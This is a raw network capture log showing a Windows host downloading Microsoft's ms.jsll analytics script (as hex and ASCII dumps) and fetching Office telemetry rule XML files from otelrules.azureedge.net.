                                                                                2024-10-04 09:34:07 UTC | 370 | OUT | GET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                Host: js.monitor.azure.com
                                                                                Connection: keep-alive
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: none
                                                                                Sec-Fetch-Mode: cors
                                                                                Sec-Fetch-Dest: empty
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                2024-10-04 09:34:07 UTC | 958 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:07 GMT
                                                                                Content-Type: text/javascript; charset=utf-8
                                                                                Content-Length: 207771
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                Last-Modified: Mon, 16 Sep 2024 18:20:53 GMT
                                                                                ETag: 0x8DCD67C4CF3530C
                                                                                x-ms-request-id: a84a52c5-d01e-00d3-671a-0ff173000000
                                                                                x-ms-version: 2009-09-19
                                                                                x-ms-meta-jssdkver: 4.3.2
                                                                                x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.2.min.js
                                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                Access-Control-Allow-Origin: *
                                                                                x-azure-ref: 20241004T093407Z-15767c5fc55sdcjq8ksxt4n9mc00000001mg000000007snt
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache-Info: L1_T2
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                Data Ascii: o,a),f[vr](),o[fr](a)},6,n),i},f[cr]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ru);var i=s(e[Zn]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[Zn]+"] is already loaded!");var a,o={reason:16};function c(){A[te](e),o.added=[e],g(o),r&&r(!
                                                                                2024-10-04 09:34:08 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 20 45 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 63 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 77 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 62 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 49 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 6b 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 5f 6c 28 29 7b 72 65 74 75 72 6e 20 53 6c 28 29 3f 45 6c 28 62 6c 2e 53 65 73 73 69 6f 6e 53 74 6f
                                                                                Data Ascii: function El(e){try{if(oe(ct()))return null;var t=(new Date)[ws](),n=fe(e===bl.LocalStorage?"localStorage":"sessionStorage"),r=Il+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[ks](r),!i)return n}catch(a){}return null}function _l(){return Sl()?El(bl.SessionSto
                                                                                2024-10-04 09:34:08 UTC16384INData Raw: 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 5f 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 66 64 5d 3d 4f 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 53 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 65 29 7b 76 61 72 20 6f 3d 74 68 69 73 2c 63 3d 7b 7d 3b 6f 2e 73 74 61 72 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 6e
                                                                                Data Ascii: not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var _d=function(e,t){this[fd]=Ot(),this.pageName=e,this.pageUrl=t},Sd=function(a,e){var o=this,c={};o.start=function(e){"un
                                                                                2024-10-04 09:34:08 UTC16384INData Raw: 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 6a 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 72 63 28 29 7d 2c 74 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54 61 67 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 6e 2e 5f 70 61 67 65 54 61 67 73 3d 7b 7d 2c
                                                                                Data Ascii: Type=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=jd(r._config),t.cookieEnabled=rc()},tp.prototype._setPageTags=function(e,t){var n=this;n._pageTags={},
                                                                                2024-10-04 09:34:08 UTC16384INData Raw: 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 78 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d 65 7c 7c 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72
                                                                                Data Ascii: aBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},xp.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].name||~t[n].name.indexOf("data-bi-"))return!0;r
                                                                                2024-10-04 09:34:08 UTC16384INData Raw: 22 2c 70 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 67 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 76 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 68 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 6d 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 79 67 3d 22 63 6f 6e 63 61 74 22 2c 43 67 3d 22 69 4b 65 79 22 2c 62 67 3d 22 63 6f 75 6e 74 22 2c 54 67 3d 22 65 76 65 6e 74 73 22 2c 49 67 3d 22 70 75 73 68 22 2c 45 67 3d 22 73 70 6c 69 74 22 2c 5f 67 3d 22 73 70 6c 69 63 65 22 2c 53 67 3d 22 74 6f 4c 6f 77 65 72 43 61 73 65 22 2c 78 67 3d 22 68 64 72 73 22 2c 4e 67 3d 22 75 73 65 48 64 72 73
                                                                                Data Ascii: ",pg="allowRequestSending",gg="firstRequestSent",vg="shouldAddClockSkewHeaders",hg="getClockSkewHeaderValue",mg="setClockSkew",ye="length",yg="concat",Cg="iKey",bg="count",Tg="events",Ig="push",Eg="split",_g="splice",Sg="toLowerCase",xg="hdrs",Ng="useHdrs
                                                                                2024-10-04 09:34:08 UTC16384INData Raw: 28 65 5b 67 76 5d 3d 30 29 2c 65 5b 76 76 5d 7c 7c 28 65 5b 76 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 68 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 76 76 5d 3d 33 2c 65 5b 68 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 59 69 28 65 29 29 2c 48 5b 5a 67 5d 28 43 76 2e 63 72 65 61 74 65 28 65 5b 43 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 68 76 5d 3f 31 3a 65 5b 68 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 76 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c 74 29 3a 28 72 3d 31 2c 69 3d 32 30 2c 34 3d 3d 3d 6e 26 26 28 72 3d 34 2c 69 3d 31 29 2c 61 3d 21 30 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 66 6f
                                                                                Data Ascii: (e[gv]=0),e[vv]||(e[vv]=1),l(e),e[hv])if(U||ae)e[vv]=3,e[hv]=!1;else if(H)return W&&(e=Yi(e)),H[Zg](Cv.create(e[Cg],[e]),!0===e[hv]?1:e[hv],3);var n=e[vv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,t):(r=1,i=20,4===n&&(r=4,i=1),a=!0,function(e,t,n,r){fo


Session ID  Source IP    Source Port  Destination IP  Destination Port
95          192.168.2.5  55514        13.107.246.60   443
Timestamp                Bytes transferred  Direction  Data
2024-10-04 09:34:08 UTC  192                OUT        GET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
2024-10-04 09:34:08 UTC  563                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:08 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1395
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                ETag: "0x8DC582BDE12A98D"
                                                                                x-ms-request-id: 1392789d-401e-0047-0e8c-158597000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093408Z-15767c5fc55jdxmppy6cmd24bn00000004p0000000001hhb
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
2024-10-04 09:34:08 UTC  1395               IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


Session ID  Source IP    Source Port  Destination IP  Destination Port
96          192.168.2.5  55516        13.107.246.60   443
Timestamp                Bytes transferred  Direction  Data
2024-10-04 09:34:08 UTC  192                OUT        GET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
2024-10-04 09:34:08 UTC  563                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:08 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1358
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                ETag: "0x8DC582BE022ECC5"
                                                                                x-ms-request-id: a76247f8-001e-00a2-558c-15d4d5000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093408Z-15767c5fc55fdfx81a30vtr1fw0000000ckg000000009umb
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
2024-10-04 09:34:08 UTC  1358               IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


Session ID  Source IP    Source Port  Destination IP  Destination Port
97          192.168.2.5  55517        13.107.246.60   443
Timestamp                Bytes transferred  Direction  Data
2024-10-04 09:34:08 UTC  192                OUT        GET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
2024-10-04 09:34:08 UTC  563                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:08 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1389
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                ETag: "0x8DC582BE10A6BC1"
                                                                                x-ms-request-id: 7afec1f8-601e-000d-328c-152618000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093408Z-15767c5fc55w69c2zvnrz0gmgw0000000cpg000000000ngs
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
2024-10-04 09:34:08 UTC  1389               IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


Session ID  Source IP    Source Port  Destination IP  Destination Port
98          192.168.2.5  55519        13.107.246.60   443
Timestamp                Bytes transferred  Direction  Data
2024-10-04 09:34:08 UTC  192                OUT        GET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
2024-10-04 09:34:08 UTC  563                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:08 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1405
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                ETag: "0x8DC582BE12B5C71"
                                                                                x-ms-request-id: 4a217eb8-401e-00a3-218c-158b09000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093408Z-15767c5fc55kg97hfq5uqyxxaw0000000cd0000000002ntw
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
2024-10-04 09:34:08 UTC  1405               IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


Session ID  Source IP    Source Port  Destination IP  Destination Port
99          192.168.2.5  55518        13.107.246.60   443
Timestamp                Bytes transferred  Direction  Data
2024-10-04 09:34:08 UTC  192                OUT        GET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
2024-10-04 09:34:08 UTC  563                IN         HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:08 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1352
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                ETag: "0x8DC582BE9DEEE28"
                                                                                x-ms-request-id: 92784c80-801e-002a-088c-1531dc000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093408Z-15767c5fc554wklc0x4mc5pq0w0000000cmg000000008yuh
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
2024-10-04 09:34:08 UTC  1352               IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


Session ID  Source IP    Source Port  Destination IP  Destination Port
100         192.168.2.5  55525        13.107.246.60   443
Timestamp                Bytes transferred  Direction  Data
2024-10-04 09:34:08 UTC  192                OUT        GET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:08 UTC   563                 IN          HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:08 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1368
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                ETag: "0x8DC582BDDC22447"
                                                                                x-ms-request-id: c825d9ef-901e-007b-278c-15ac50000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093408Z-15767c5fc55whfstvfw43u8fp40000000cfg0000000052u3
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:08 UTC   1368                IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                Session ID   Source IP     Source Port   Destination IP   Destination Port
                                                                                101          192.168.2.5   55530         13.107.246.60    443
                                                                                Timestamp                 Bytes transferred   Direction   Data
                                                                                2024-10-04 09:34:09 UTC   192                 OUT         GET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:09 UTC   563                 IN          HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:09 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1364
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                ETag: "0x8DC582BE1223606"
                                                                                x-ms-request-id: ed356ac5-101e-0046-2b8c-1591b0000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093409Z-15767c5fc55whfstvfw43u8fp40000000ceg0000000069xx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:09 UTC   1364                IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                Session ID   Source IP     Source Port   Destination IP   Destination Port
                                                                                102          192.168.2.5   55529         13.107.246.60    443
                                                                                Timestamp                 Bytes transferred   Direction   Data
                                                                                2024-10-04 09:34:09 UTC   192                 OUT         GET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:09 UTC   563                 IN          HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:09 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1401
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                ETag: "0x8DC582BE055B528"
                                                                                x-ms-request-id: 6a90350a-301e-005d-348c-15e448000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093409Z-15767c5fc55v7j95gq2uzq37a00000000cn0000000002g81
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:09 UTC   1401                IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                Session ID   Source IP     Source Port   Destination IP   Destination Port
                                                                                103          192.168.2.5   55533         13.107.246.60    443
                                                                                Timestamp                 Bytes transferred   Direction   Data
                                                                                2024-10-04 09:34:09 UTC   192                 OUT         GET /rules/rule700401v2s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:09 UTC   563                 IN          HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:09 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1403
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                ETag: "0x8DC582BDCB4853F"
                                                                                x-ms-request-id: 6ec2e3f4-801e-007b-208c-15e7ab000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093409Z-15767c5fc55rg5b7sh1vuv8t7n0000000cn0000000007scn
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:09 UTC   1403                IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700401" V="2" DC="SM" EN="Office.Telemetry.Event.Office.Telemetry.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                Session ID   Source IP     Source Port   Destination IP   Destination Port
                                                                                104          192.168.2.5   55532         13.107.246.60    443
                                                                                Timestamp                 Bytes transferred   Direction   Data
                                                                                2024-10-04 09:34:09 UTC   192                 OUT         GET /rules/rule702201v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:09 UTC   563                 IN          HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:09 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1397
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:56 GMT
                                                                                ETag: "0x8DC582BE7262739"
                                                                                x-ms-request-id: 76616de5-c01e-0082-6f8c-15af72000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093409Z-15767c5fc55sdcjq8ksxt4n9mc00000001q0000000003zv7
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:09 UTC   1397                IN
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.TellMe.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTel


                                                                                Session ID   Source IP     Source Port   Destination IP   Destination Port
                                                                                105          192.168.2.5   55531         13.107.246.60    443
                                                                                Timestamp                 Bytes transferred   Direction   Data
                                                                                2024-10-04 09:34:09 UTC   192                 OUT         GET /rules/rule702200v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:09 UTC   563                 IN          HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:09 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1360
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                ETag: "0x8DC582BDDEB5124"
                                                                                x-ms-request-id: 29534450-901e-0064-768c-15e8a6000000
                                                                                x-ms-version: 2018-03-28
